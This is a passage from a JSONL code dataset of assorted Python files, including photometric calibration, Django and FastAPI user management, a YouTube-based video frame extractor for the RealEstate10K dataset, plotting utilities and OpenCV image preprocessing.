UPDATE THE COUNT TO SQL DATABASE\n update_stat = \"UPDATE SCHEDULE SET COUNT = %s WHERE CCTV_ID = %s\"\n params = (count,_id)\n print(params)\n cursor.execute(update_stat,params)\n db.commit()\n print('Upadting SQL')\n\n ## EXIST WHEN THE ROWS ARE COMPLTED\n print('exist')\n\n ## AFTER EVERY 30 SECS THE PROGRAM IS RUN AGAIN\n s.enter(30, 1, autoupdate, (sc,))\n\n## AFTER 0 SECS NEXT ROW OF THE TABLE IS EXCECUTED\ns.enter(0, 1, autoupdate, (s,))\ns.run()","sub_path":"recognition_final.py","file_name":"recognition_final.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"525751425","text":"# -*- coding: utf-8 -*-\n\nfrom collective.documentgenerator.helper.base import DisplayProxyObject\nfrom collective.documentgenerator.helper.base import DocumentGenerationHelperView\nfrom collective.documentgenerator.interfaces import IFieldRendererForDocument\n\nfrom zope.component import getMultiAdapter\n\n\nclass ATDocumentGenerationHelperView(DocumentGenerationHelperView):\n \"\"\"\n Archetypes implementation of document generation helper methods.\n \"\"\"\n\n def display(self, field_name, context=None, no_value=''):\n if context is None:\n context = self.real_context\n\n if self.check_permission(field_name, context):\n field_renderer = self.get_AT_field_renderer(field_name, context)\n display_value = field_renderer.render(no_value=no_value)\n else:\n display_value = u''\n\n return display_value\n\n def check_permission(self, field_name, context):\n return bool(context.getField(field_name).checkPermission('r', context))\n\n def get_AT_field_renderer(self, field_name, context):\n field = context.getField(field_name)\n widget = field.widget\n renderer = getMultiAdapter((field, widget, context), IFieldRendererForDocument)\n\n return renderer\n\n def display_date(self, field_name, context=None, long_format=None, time_only=None, custom_format=None):\n date_field = self.context.getField(field_name)\n date = date_field.get(self.context)\n if not custom_format:\n # use toLocalizedTime\n formatted_date = self.plone.toLocalizedTime(date, long_format, time_only)\n else:\n formatted_date = date.strftime(custom_format)\n\n return formatted_date\n\n def display_voc(self, field_name, context=None, separator=', '):\n if context is None:\n context = self.real_context\n\n display_value = context.restrictedTraverse('@@at_utils').translate\n\n field = context.getField(field_name)\n voc = field.Vocabulary(context)\n raw_values = field.get(context)\n values = [display_value(voc, val) for val in raw_values]\n display = separator.join(values)\n\n return display\n\n def display_text(self, field_name, context=None):\n if not self.appy_renderer:\n return ''\n\n if context is None:\n context = self.real_context\n\n html_field = self.context.getField(field_name)\n html_text = html_field.get(context)\n display = self.appy_renderer.renderXhtml(html_text)\n return display\n\n def display_list(self, field_name, separator=', '):\n field = self.real_context.getField(field_name)\n values = field.get(self.real_context)\n display = separator.join(values)\n\n return display\n\n def list(self, field_name):\n field = self.real_context.getField(field_name)\n values = field.get(self.real_context)\n\n return values\n\n\nclass ATDisplayProxyObject(DisplayProxyObject):\n \"\"\"\n Archetypes implementation of DisplayProxyObject.\n \"\"\"\n\n def is_field(self, attr_name):\n is_field = bool(self.context.getField(attr_name))\n return is_field\n","sub_path":"src/collective/documentgenerator/helper/archetypes.py","file_name":"archetypes.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"639098073","text":"# -*- coding: utf-8 -*-\n\"\"\" \n\nCreated on 01/12/17\n\nAuthor : Carlos Eduardo Barbosa\n\nDetermination of solution for photometric calibration.\n\n\"\"\"\nfrom __future__ import print_function, division\n\nimport os\nimport sys\nimport yaml\nfrom datetime import date\n\nimport numpy as np\nimport astropy.units as u\nfrom astropy.io import ascii\nfrom astropy.table import Table, vstack\nimport speclite.filters\nimport pymc3 as pm\n\nimport context\n\ndef load_java_system(version):\n \"\"\" Use speclite to load Javalambre's SPLUS filters for convolution. \"\"\"\n tables_dir = os.path.join(os.path.split(os.path.realpath(__file__))[0],\n \"tables\")\n filters_dir = os.path.join(tables_dir, \"filter_curves\", version)\n ftable = ascii.read(os.path.join(tables_dir, \"filter_lam_filename.txt\"))\n filternames = []\n for f in ftable:\n filtname = f[\"filter\"]\n fname = os.path.join(filters_dir, f[\"filename\"])\n fdata = np.loadtxt(fname)\n fdata = np.vstack(((fdata[0,0]-1, 0), fdata, (fdata[-1,0]+1, 0)))\n w = fdata[:,0] * u.AA\n response = np.clip(fdata[:,1], 0., 1.)\n speclite.filters.FilterResponse(wavelength=w,\n response=response, meta=dict(group_name=\"java\",\n band_name=filtname.upper()))\n filternames.append(\"java-{}\".format(filtname))\n java = speclite.filters.load_filters(*filternames)\n return java\n\ndef get_splus_magnitudes(stars, library, filter_curves):\n \"\"\" Obtain magnitude of stars used in the calibration in the\n S-PLUS system. \"\"\"\n stds_dir = os.path.join(os.path.split(os.path.realpath(__file__))[0],\n \"tables/stdstars\", library)\n java = load_java_system(filter_curves)\n mags = {}\n for star in stars:\n specfile = os.path.join(stds_dir, \"f{}.dat\".format(star))\n if not os.path.exists(specfile):\n continue\n wave, flux = np.loadtxt(specfile, usecols=(0,1), unpack=True)\n wave = wave * u.AA\n flux = flux * (10 ** -16) * u.erg / u.cm / u.cm / u.s / u.AA\n m = java.get_ab_magnitudes(flux, wave, mask_invalid=True)\n mags[star] = m\n return mags\n\ndef single_band_calib(data, outdb, redo=False):\n \"\"\" Determining zero points for single band data.\n \"\"\"\n if os.path.exists(outdb) and not redo:\n return\n data = data.to_pandas()\n nights = list(data.DATE.unique())\n nights_lookup = dict(zip(nights, range(len(nights))))\n data[\"night\"] = data.DATE.copy()\n data['night'] = data.night.replace(nights_lookup).values\n N = len(nights)\n with pm.Model():\n # Hyperpriors\n Mzp = pm.Normal('Mzp', mu=20., sd=2)\n Szp = pm.HalfCauchy('Szp', 5)\n Mkappa = pm.Normal('Mkappa', mu=0., sd=1)\n Skappa = pm.HalfCauchy(r'Skappa', 5)\n # Randon intercepts\n zp = pm.Cauchy(\"zp\", alpha=Mzp, beta=Szp, shape=N)\n # Common slope\n kappa = pm.Cauchy(r\"kappa\", alpha=Mkappa, beta=Skappa, shape=N)\n # Model error\n eps = pm.HalfCauchy(r\"eps\", 5)\n # Expected value\n linear_regress = zp[data[\"night\"]] - \\\n kappa[data[\"night\"]] * data[\"AIRMASS\"]\n pm.Cauchy('y', alpha=linear_regress, beta=eps,\n observed=data[\"DELTAMAG\"])\n trace = pm.sample(nchains=4, njobs=4)\n pm.save_trace(trace, outdb, overwrite=True)\n summary = []\n for night, idx in nights_lookup.items():\n t = Table([[night], [np.mean(trace[\"zp\"][:, idx])],\n [np.std(trace[\"zp\"][:, idx])],\n [np.mean(trace[\"kappa\"][:, idx])],\n [np.std(trace[\"kappa\"][:, idx])]],\n names=[\"date\", \"zp\", \"zperr\", \"kappa\", \"kappaerr\"])\n summary.append(t)\n summary = vstack(summary)\n summary.write(\"{}.txt\".format(outdb), overwrite=True, format=\"ascii\")\n # Saving dictionary with indices to allow use of traces\n root, band = os.path.split(outdb)\n nights_lookup = {k.decode(): v for k, v in nights_lookup.items()}\n with open(os.path.join(root, \"index_night_{}.yaml\".format(band)),\n \"w\") as f:\n yaml.dump(nights_lookup, f, default_flow_style=False)\n\n return\n\ndef main():\n config_files = [_ for _ in sys.argv if _.endswith(\".yaml\")]\n if len(config_files) == 0:\n config_files = [\"config_mode5.yaml\"]\n print(\"Configuration file not set. Using default mode 5.\")\n for filename in config_files:\n with open(filename) as f:\n config = yaml.load(f)\n calib_dir = os.path.join(config[\"main_dir\"], \"calib\")\n phot_file = os.path.join(calib_dir,\n \"phottable_{}.fits\".format(config[\"name\"]))\n phot = Table.read(phot_file)\n # Setting up the output directory\n today = date.today()\n outdir = os.path.join(calib_dir, \"{}-{}\".format(\n config[\"name\"], today.strftime(\"%Y-%m-%d\")))\n ########################################################################\n # Remove flagged stars\n flagged_stars = [_.lower().replace(\" \", \"\") for _ in config[\n \"flagged_stars\"]]\n badidx = []\n for fstar in flagged_stars:\n idx = np.where(phot[\"STAR\"]==fstar)[0]\n badidx.append(idx)\n badidx = np.hstack(badidx)\n goodidx = np.arange(len(phot))\n goodidx = np.delete(goodidx, badidx)\n phot = phot[goodidx]\n ########################################################################\n # Remove saturated stars\n idx = np.where(phot[\"FLAGS\"] <= 2)[0]\n phot = phot[idx]\n ########################################################################\n # Add columns to the photometry table containing the model magnitudes\n stars = set(phot[\"STAR\"])\n model_mags = get_splus_magnitudes(stars, config[\"stdlib\"],\n config[\"filters_version\"])\n modelmag = np.zeros(len(phot)) * np.nan\n for star in stars:\n if star not in model_mags:\n print(\"Star not found in database: {}\".format(star))\n continue\n for band in context.bands:\n fname = \"java-{}\".format(band)\n idx = np.where((phot[\"STAR\"]==star) & (phot[\"FILTER\"]==band))[0]\n modelmag[idx] = float(model_mags[star][fname])\n phot[\"MODELMAG\"] = modelmag\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n for flux in config[\"sex_phot\"]:\n p = Table(phot, copy=True)\n p[\"OBSMAG\"] = -2.5 * np.log10(p[flux] / p[\"EXPTIME\"])\n p[\"DELTAMAG\"] = p[\"MODELMAG\"] - p[\"OBSMAG\"]\n ####################################################################\n # Removing problematic lines\n p = p[np.isfinite(p[\"DELTAMAG\"])]\n dbs_dir = os.path.join(outdir, flux)\n if not os.path.exists(dbs_dir):\n os.mkdir(dbs_dir)\n for band in context.bands:\n print(filename, band)\n idx = np.where(band == p[\"FILTER\"])[0]\n if len(idx) == 0:\n continue\n outdb = os.path.join(dbs_dir, band)\n data = p[idx]\n data.write(os.path.join(dbs_dir, \"phot_{}.fits\".format(band)),\n overwrite=True)\n single_band_calib(data, outdb, redo=True)\n\nif __name__ == \"__main__\":\n main()","sub_path":"splus-stdcal/stdcal.py","file_name":"stdcal.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472705445","text":"import csv\nfrom django.core.management.base import BaseCommand\nfrom django.core.management.base import CommandError\nfrom django.utils.encoding import smart_str\n\nfrom unit.models import Component\n\n\n# Import units from a CSV file. Will update exisiting records\n# Run:\n# python manage.py import_units_from_csv C:\\Users\\Pete\\Desktop\\units.csv\n\n\nSILENT, NORMAL, VERBOSE, VERY_VERBOSE = 0, 1, 2, 3\n\nclass Command(BaseCommand):\n\targs = \"\"\n\thelp = \"Imports units from a local CSV file.\"\n\n\tdef handle(self, *args, **options):\n\t\tverbosity = int(options.get(\"verbosity\", NORMAL))\n\n\t\tif args:\n\t\t\tfile_path = args[0]\n\t\telse:\n\t\t\traise CommandError(\"Pass a path to a CSV file\")\n\n\t\tif verbosity >= NORMAL:\n\t\t\tprint ('----Units Imported----')\n\n\t\twith open(file_path) as f:\n\t\t\treader = csv.reader(f)\n\n\t\t\tfor part_name, part_number, specification, RE_first_name, RE_last_name, supplier, SCA_first_name, SCA_last_name in reader:\n\t\t\t\tcomponent, created = Component.objects.update_or_create(\n\t\t\t\t\tpart_name = part_name,\n\t\t\t\t\tpart_number = part_number,\n\t\t\t\t\tspecification = specification,\n\t\t\t\t\tRE_first_name = RE_first_name,\n\t\t\t\t\tRE_last_name = RE_last_name,\n\t\t\t\t\tsupplier = supplier,\n\t\t\t\t\tSCA_first_name = SCA_first_name,\n\t\t\t\t\tSCA_last_name = SCA_last_name\n\t\t\t\t\t)\n\t\t\t\tif verbosity >= NORMAL:\n\t\t\t\t\tprint (\"-- %s. Record created: %s\" % (smart_str(component.part_number), created))","sub_path":"unit/management/commands/import_units_from_csv.py","file_name":"import_units_from_csv.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203153044","text":"\n#: The version of Review Bot.\n#:\n#: This is in the format of:\n#:\n#: (Major, Minor, Micro, Patch, alpha/beta/rc/final, Release Number, Released)\n#:\nVERSION = (3, 2, 1, 0, 'alpha', 0, False)\n\n\ndef get_version_string():\n \"\"\"Return the version of Review Bot.\n\n Returns:\n unicode:\n The full version.\n \"\"\"\n version = '%s.%s' % (VERSION[0], VERSION[1])\n\n if VERSION[2] or VERSION[3]:\n version = '%s.%s' % (version, VERSION[2])\n\n if VERSION[3]:\n version = '%s.%s' % (version, VERSION[3])\n\n tag = VERSION[4]\n\n if tag != 'final':\n if tag == 'rc':\n version = '%s RC%s' % (version, VERSION[5])\n else:\n version = '%s %s %s' % (version, tag, VERSION[5])\n\n if not is_release():\n version += ' (dev)'\n\n return version\n\n\ndef get_package_version():\n \"\"\"Return the package version of Review Bot.\n\n This is a simplified version string which is used when building a package.\n\n Returns:\n unicode:\n The version to use for the package.\n \"\"\"\n version = '%d.%d' % (VERSION[0], VERSION[1])\n\n if VERSION[2] or VERSION[3]:\n version = '%s.%s' % (version, VERSION[2])\n\n if VERSION[3]:\n version = '%s.%s' % (version, VERSION[3])\n\n tag = VERSION[4]\n\n if tag != 'final':\n if tag == 'alpha':\n tag = 'a'\n elif tag == 'beta':\n tag = 'b'\n\n version = '%s%s%s' % (version, tag, VERSION[5])\n\n return version\n\n\ndef is_release():\n \"\"\"Return whether the current version is a release.\n\n Returns:\n boolean:\n True if the current version of Review Bot is a released package.\n \"\"\"\n return VERSION[6]\n\n\n#: An alias for the the version information from :py:data:`VERSION`.\n#:\n#: This does not include the last entry in the tuple (the released state).\n__version_info__ = VERSION[:-1]\n\n#: An alias for the version used for the Python package.\n__version__ = get_package_version()\n","sub_path":"bot/reviewbot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"484718923","text":"#!/usr/bin/env python\n\nfrom typing import List, Tuple\nfrom typing import Optional\nfrom typing import Type, Any\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport re\nfrom pathlib import Path\n\nimport bdgtools.util as butil\n\ndef eigenval(evals, ax=None, eval_props=None, cums_props=None,\n legend=True, legend_props=None):\n evals = abs(evals)\n cumsum = np.cumsum(evals)\n totsum = np.sum(evals)\n cumsum /= totsum\n\n if ax is None:\n fig, ax = plt.subplots()\n else:\n fig = ax.get_figure()\n\n eval_props_tmp = {\n 'color': '#396ab1',\n 'marker': 'o',\n 'markersize': 3,\n 'linewidth': 0,\n }\n if eval_props is not None:\n eval_props_tmp.update(eval_props)\n\n cums_props_tmp = {\n 'color' : '#da7c30',\n 'marker': 'o',\n 'markersize': 3,\n 'linewidth': 0,\n }\n if cums_props is not None:\n cums_props_tmp.update(cums_props)\n\n axr = ax.twinx()\n\n index = np.linspace(1, len(evals), len(evals))\n evals_line, = ax.plot(index, evals, **eval_props_tmp)\n cums_line, = axr.plot(index, cumsum, **cums_props_tmp)\n\n\n\n if legend:\n legend_props_tmp = {\n 'handles': [evals_line, cums_line],\n 'labels': [r'$y(x_i)$', r'$\\frac{1}{n}\\sum_{j=1}^{i} y(x_j)$'],\n 'fontsize': 4,\n 'loc': (1.3, 0.6),\n 'frameon': False,\n }\n if legend_props is not None:\n legend_props_tmp.update(legend_props)\n\n ax.legend(\n **legend_props_tmp\n )\n axr.set(**{\n 'ylim': (0, 1.1),\n })\n\n return (fig, ax, axr, evals_line, cums_line)\n\n\ndef histogram(x, data=None, mean=None, std=None,\n ax=None,\n line_props={}, fill_props={}, ax_props={}):\n \"\"\"data: List of arrays\n \"\"\"\n\n # If no axes is given, create a new one\n if ax is None:\n ax = plt.gca()\n\n # Todo: Implement other plotting options\n if mean is not None:\n ax.plot(x, mean, **line_props)\n if std is not None:\n lowerbound = mean - std\n lowerbound[lowerbound < 0] = 0\n ax.fill_between(\n x,\n lowerbound,\n mean + std,\n **fill_props)\n\n ax.set(**ax_props)\n\n\ndef plot(y, x=None, ax=None):\n \"\"\"data: List of arrays\n \"\"\"\n # If no axes is given, create a new one\n if ax is None:\n ax = plt.gca()\n\n if x is None:\n ax.plot(y)\n plt.show()\n\nif __name__ == \"__main__\":\n import argparse\n import warnings\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('command')\n\n parser.add_argument(\n '-f', '--FILE', metavar='',\n type=str,\n help='Input path and filename.',\n default=None,\n )\n\n parser.add_argument(\n '-o', '--OUTPUT', metavar='',\n type=str,\n help='Output path and filename.',\n default=None,\n )\n\n parser.add_argument(\n '-warn', '--WARNINGS',\n action='store_true',\n help='Enable python interpreter related warnings.',\n default=False,\n )\n\n parser.add_argument(\n '-full', '--FULL',\n action='store_true',\n help='Enable printing of full instead of truncated list-like \\\n objects in same cases.',\n default=False,\n )\n\n parser.add_argument(\n '-l', '--STRINGS', metavar='<[str, ...]>',\n nargs='+',\n type=str,\n help = 'List of strings.',\n default = None\n )\n\n parser.add_argument(\n '-mark', '--MARK', metavar='',\n type=str,\n help='String inserted in output file at truncation points.',\n default=None,\n )\n\n parser.add_argument(\n '-res', '--RESIDUE', metavar='',\n type=str,\n help='String inserted in residue column of PDB file.',\n default=None,\n )\n\n args = parser.parse_args()\n\n warn = args.WARNINGS\n if warn is False:\n\t warnings.filterwarnings('ignore')\n\n command = args.command\n infile = args.FILE\n outfile = args.OUTPUT\n\n if command == \"histogram\":\n l = args.STRINGS\n mark = args.MARK\n histogram(infile, l, outfile, mark)\n\n if command == \"plot\":\n f = Path(args.FILE)\n\n if f.suffix == '.xvg':\n options = {\n \"comments\": [\"#\", \"@\", \"%\"],\n \"usecols\": [1],\n }\n\n file_ = butil.load_file(f, **options)\n plot(file_)\n","sub_path":"bdgtools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"33405171","text":"\"\"\" An example PySide application. \"\"\"\n\n\nimport PySide.QtGui as QtGui\n\nfrom enthought.traits.api import Int, Str\n\n\nclass MainWindow(QtGui.QMainWindow):\n \"\"\" The main application window. \"\"\"\n\n def __init__(self, parent=None):\n \"\"\" Constructor. \"\"\"\n\n super(MainWindow, self).__init__(parent)\n\n self.setMenuBar(self._create_menu_bar())\n self.setCentralWidget(self._create_example_list_widget())\n \n return\n\n #### Private protocol ######################################################\n\n def _create_example_list_widget(self):\n \"\"\" Factory method for the example list widget. \"\"\"\n\n list_widget = QtGui.QListWidget(self)\n icon = QtGui.QIcon('bullet-yellow.png')\n \n QtGui.QListWidgetItem(icon, 'Oak', list_widget)\n QtGui.QListWidgetItem(icon, 'Fir', list_widget)\n QtGui.QListWidgetItem(icon, 'Pine', list_widget)\n\n return list_widget\n \n def _create_menu_bar(self):\n \"\"\" Factory method for the menu bar. \"\"\"\n\n menu_bar = QtGui.QMenuBar(self)\n\n # Actions.\n quit_action = QtGui.QAction(self)\n quit_action.setText('&Quit')\n quit_action.triggered.connect(self.close)\n\n # Menus.\n file_menu = QtGui.QMenu(menu_bar)\n file_menu.setTitle('&File')\n menu_bar.addMenu(file_menu)\n\n # Populate the menus with the actions!\n file_menu.addAction(quit_action)\n\n return menu_bar\n\n\ndef main(argv):\n \"\"\" Entry point. \"\"\"\n\n application = QtGui.QApplication(argv)\n\n main_window = MainWindow()\n main_window.show()\n \n application.exec_()\n\n return\n\n\nif __name__ == '__main__':\n import sys; sys.exit(main(sys.argv))\n\n#### EOF ######################################################################\n","sub_path":"PySide/pyside_application.py","file_name":"pyside_application.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534409575","text":"import cv2\nimport os\nimport random\nfrom subprocess import call\nimport pickle\n\noutputResultPath = './transcode/'\nbasePath = './RealEstate10K/'\n\n# set of videos that were not found\nnotFoundVideosPath = \"./downloaded/notFound.pkl\"\n\ndef loadNotFoundVideos():\n if os.path.exists(notFoundVideosPath):\n with open(notFoundVideosPath, 'rb') as f:\n return pickle.load(f)\n else:\n return set()\n\nnotFoundVideos = loadNotFoundVideos()\n\nprocessedTxtFilesPath = \"./processedTxtFiles.pkl\"\n\ndef loadProcessedTxtFiles():\n if os.path.exists(processedTxtFilesPath):\n with open(processedTxtFilesPath, 'rb') as f:\n return pickle.load(f)\n else:\n return set()\n\n# These are the txt files that were SUCCESSFULLY processed\n# This is useful to create a \"golden\" record of the dataset\nprocessedTxtFiles = loadProcessedTxtFiles()\n\ndef downloadVideo(videoPathURL, notFoundVideos):\n youtubeIDOffset = videoPathURL.find(\"/watch?v=\") + len('/watch?v=')\n\n youtubeID = videoPathURL[youtubeIDOffset:]\n targetPath = \"./downloaded/{}\".format(youtubeID)\n \n if youtubeID in notFoundVideos:\n return targetPath, \"DOWNLOAD_ERROR\", notFoundVideos, youtubeID\n \n if os.path.exists(targetPath):\n print('Skipped {}, warning EXISTS'.format(targetPath))\n return targetPath, False, notFoundVideos, youtubeID\n\n return_code = call([\"youtube-dl\", \"-f\", \"bestvideo[height<=480]\", videoPathURL, \"-o\", targetPath, \"--cookies\", \"./cookies.txt\" ])\n error = False if return_code == 0 else \"DOWNLOAD_ERROR\"\n \n if \"DOWNLOAD_ERROR\" == error:\n notFoundVideos.add(youtubeID)\n with open(notFoundVideosPath, 'wb') as f:\n pickle.dump(notFoundVideos, f)\n\n return targetPath, error, notFoundVideos, youtubeID\n\ndef getBestMatchingFrames(frameTimeStamp, case, maxFrameMatchingDistanceInNS=8000):\n matches = []\n for caseIdx, c in enumerate(case):\n distance = abs(c['timeStamp'] - frameTimeStamp)\n if distance < maxFrameMatchingDistanceInNS:\n #print(c['timeStamp'], frameTimeStamp)\n #print('case index', caseIdx, 'distance',distance)\n matches.append({\n 'caseIdx': caseIdx,\n 'distance': distance,\n })\n\n matches.sort(key=lambda x: x['distance'])\n return matches\n\nfor rootPath in os.listdir(basePath):\n if 'download' in rootPath:\n continue\n\n subRootPath = os.path.join(basePath, rootPath)\n for subPath in os.listdir(subRootPath):\n dataFilePath = os.path.join(subRootPath, subPath)\n\n case = []\n\n with open(dataFilePath) as f:\n videoPathURL = f.readline().rstrip()\n # process all the rest of the lines \t\n for l in f.readlines():\n line = l.split(' ')\n\n timeStamp = int(line[0])\n intrinsics = [float(i) for i in line[1:7]]\n pose = [float(i) for i in line[7:19]]\n case.append({\n 'timeStamp': timeStamp, \n 'intrinsics': intrinsics,\n 'pose': pose})\n\n downloadedVideoPath, error, notFoundVideos, youtubeID = downloadVideo(videoPathURL, notFoundVideos)\n \n if error != False:\n print('Skipped {}, error {}'.format(downloadedVideoPath, error))\n continue\n\n # build out the specific frames for the case\n video = cv2.VideoCapture(downloadedVideoPath) \n video.set(cv2.CAP_PROP_POS_MSEC, 0)\n #import pdb; pdb.set_trace()\n\n while video.isOpened(): \n frameOK, imgFrame = video.read() \n if frameOK == False:\n print('video processing complete')\n break\n\n frameTimeStamp = (int)(round(video.get(cv2.CAP_PROP_POS_MSEC)*1000))\n\n matches = getBestMatchingFrames(frameTimeStamp, case, 1e9 / (2* video.get(cv2.CAP_PROP_FPS)))\n for match in matches:\n caseOffset = match['caseIdx']\n distance = match['distance']\n # match was successful, write frame\n imageOutputDir = os.path.join(outputResultPath, youtubeID)\n \n if not os.path.exists(imageOutputDir):\n os.makedirs(imageOutputDir)\n imageOutputPath = os.path.join(imageOutputDir, '{}.jpg'.format(case[caseOffset]['timeStamp']) )\n \n if not os.path.exists(imageOutputPath):\n print(\"Writing {} for frame {}, distance {}\".format(imageOutputPath, case[caseOffset]['timeStamp'], distance))\n cv2.imwrite(imageOutputPath, imgFrame)\n\n case[caseOffset]['imgPath'] = imageOutputPath\n \n # write the case file to disk\n processedTxtFiles.add(subPath)\n with open(processedTxtFilesPath, 'wb') as f:\n pickle.dump(processedTxtFiles, f)\n #caseFileOutputPath = os.path.join(imageOutputDir, 'case.pkl')\n #with open(caseFileOutputPath, 'wb') as f:\n # pickle.dump(case, f)\n","sub_path":"downloadAndProcess.py","file_name":"downloadAndProcess.py","file_ext":"py","file_size_in_byte":5068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467166580","text":"from fastapi_jwt_auth import AuthJWT\nfrom fastapi import APIRouter, Response, Depends\nfrom controller.UserController import UserCrud, UserFetch, UserLogic\nfrom schemas.users.RegisterSchema import RegisterSchema\nfrom schemas.users.UserSchema import UserLogin, UserOut, UserUpdate\nfrom config import conn_redis, ACCESS_EXPIRES, REFRESH_EXPIRES\nfrom typing import List\n\nclass JwtAuthToken:\n def __init__(self):\n self.jwt_auth = AuthJWT(None)\n\n def __call__(self):\n return self.jwt_auth\n\n\nrouter = APIRouter()\nauth_token = JwtAuthToken()\n\n@router.post('/register', status_code=201)\nasync def register(user: RegisterSchema):\n await UserCrud.create_user(**user.dict(exclude={'confirm_password'}))\n return {\"message\":\"email already register\"}\n\n@router.post('/login')\nasync def login(user: UserLogin, res: Response, Authorize: AuthJWT = Depends(auth_token)):\n user_exists = await UserFetch.filter_by_email(user.email)\n if (\n user_exists and\n UserLogic.check_user_password(password=user.password,hashed_pass=user_exists.password)\n ):\n access_token = Authorize.create_access_token(identity=user_exists.id,fresh=True)\n refresh_token = Authorize.create_refresh_token(identity=user_exists.id)\n\n return {\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n \"username\": user_exists.username\n }\n\n res.status_code = 422\n return {\"message\":\"Invalid credential\"}\n\n@router.post('/refresh-token')\nasync def refresh_token(Authorize: AuthJWT = Depends()):\n Authorize.jwt_refresh_token_required()\n\n user_id = Authorize.get_jwt_identity()\n new_token = Authorize.create_access_token(identity=user_id,fresh=False)\n return {\"access_token\": new_token}\n\n@router.delete('/access-token-revoke')\nasync def access_token_revoke(Authorize: AuthJWT = Depends()):\n Authorize.jwt_required()\n\n jti = Authorize.get_raw_jwt()['jti']\n conn_redis.setex(jti,ACCESS_EXPIRES,\"true\")\n return {\"message\":\"Access token revoked.\"}\n\n@router.delete('/refresh-token-revoke')\nasync def refresh_token_revoke(Authorize: AuthJWT = Depends()):\n Authorize.jwt_refresh_token_required()\n\n jti = Authorize.get_raw_jwt()['jti']\n conn_redis.setex(jti,REFRESH_EXPIRES,\"true\")\n return {\"message\":\"Refresh token revoked.\"}\n\n@router.get('/me', response_model=UserOut)\nasync def get_my_user(Authorize: AuthJWT = Depends()):\n Authorize.jwt_required()\n\n user_id = Authorize.get_jwt_identity()\n return await UserFetch.filter_by_id(id=user_id)\n\n@router.get('/', response_model=List[UserOut])\nasync def all_user():\n return await UserFetch.all_user()\n\n@router.put('/update')\nasync def update_user(user: UserUpdate, Authorize: AuthJWT = Depends()):\n Authorize.fresh_jwt_required()\n\n user_id = Authorize.get_jwt_identity()\n await UserCrud.update_user(user_id=user_id,**user.dict())\n return {\"message\": \"Success update your account.\"}\n\n@router.delete('/{user_id}')\nasync def delete_user(user_id: int):\n await UserCrud.delete_user(user_id=user_id)\n return {\"message\": \"Success delete user.\"}\n","sub_path":"examples/multiple_files/services/routers/Users.py","file_name":"Users.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304011625","text":"import os\nimport sys\n\nROOTDIR = (\n os.path.dirname(\n os.path.dirname(\n os.path.abspath(__file__)\n)))\n\nsys.path = [ROOTDIR] + sys.path\n\nimport LostCitiesScore.scorecounter as counter\n\n\n\n\ndef main():\n player_one = 0\n player_two = 0\n\n rounds = range(1, 4)\n\n for rnd in rounds:\n print()\n print('.'*79)\n print('Round: {}'.format(rnd))\n\n scoretext = input('\\tPlayer 1 cards: ')\n roundscore = counter.PlayerRows(text=scoretext).value\n player_one += roundscore\n print('\\t round score: {}'.format(roundscore))\n print('\\t total score: {}'.format(player_one))\n\n print()\n\n scoretext = input('\\tPlayer 2 cards: ')\n roundscore = counter.PlayerRows(text=scoretext).value\n player_two += roundscore\n print('\\t round score: {}'.format(roundscore))\n print('\\t total score: {}'.format(player_two))\n\n print('\\tscore diff: {}'.format(abs(player_two-player_one)))\n\n print()\n print('-'*79)\n print('Total:')\n print('player one total: {}'.format(player_one))\n print('player two total: {}'.format(player_two))\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"LostCitiesScore/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"152149690","text":"# Preprocess.py\n\nimport cv2\nimport numpy as np\nimport math\nimport Main\n# module level variables ##########################################################################\nGAUSSIAN_SMOOTH_FILTER_SIZE = (5, 5)\nADAPTIVE_THRESH_BLOCK_SIZE = 19\nADAPTIVE_THRESH_WEIGHT = 9\n\n###################################################################################################\ndef preprocess(imgOriginal):\n imgGrayscale = extractValue(imgOriginal) # We get the gray scale of the image.\n #imgGrayscale = cv2.equalizeHist(imgGrayscale)\n imgMaxContrastGrayscale = maximizeContrast(imgGrayscale) # contrast is the difference between light and dark in an image. High contrast images will have bright highlights and dark shadows,bold colours, and show texture in the subject. Low contrast images will have a narrow range of tones and might therefore feel flat or dull\n height,width = imgGrayscale.shape\n imgBlurred = np.zeros((height, width, 1), np.uint8)\n\n imgBlurred = cv2.GaussianBlur(imgMaxContrastGrayscale, GAUSSIAN_SMOOTH_FILTER_SIZE, 0) # 2nd parameter is (height,width) of Gaussian kernel,3rd parameter is sigmaX,4th parameter is sigmaY(as not specified it is made same as sigmaX).\n \n imgThresh = cv2.adaptiveThreshold(imgBlurred, 255.0, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, ADAPTIVE_THRESH_BLOCK_SIZE, ADAPTIVE_THRESH_WEIGHT)\n \n return imgGrayscale, imgThresh\n\n###################################################################################################\ndef extractValue(imgOriginal):\n height, width, numChannels = imgOriginal.shape\n\n imgHSV = np.zeros((height, width, 3), np.uint8)\n\n imgHSV = cv2.cvtColor(imgOriginal, cv2.COLOR_BGR2HSV)\n\n 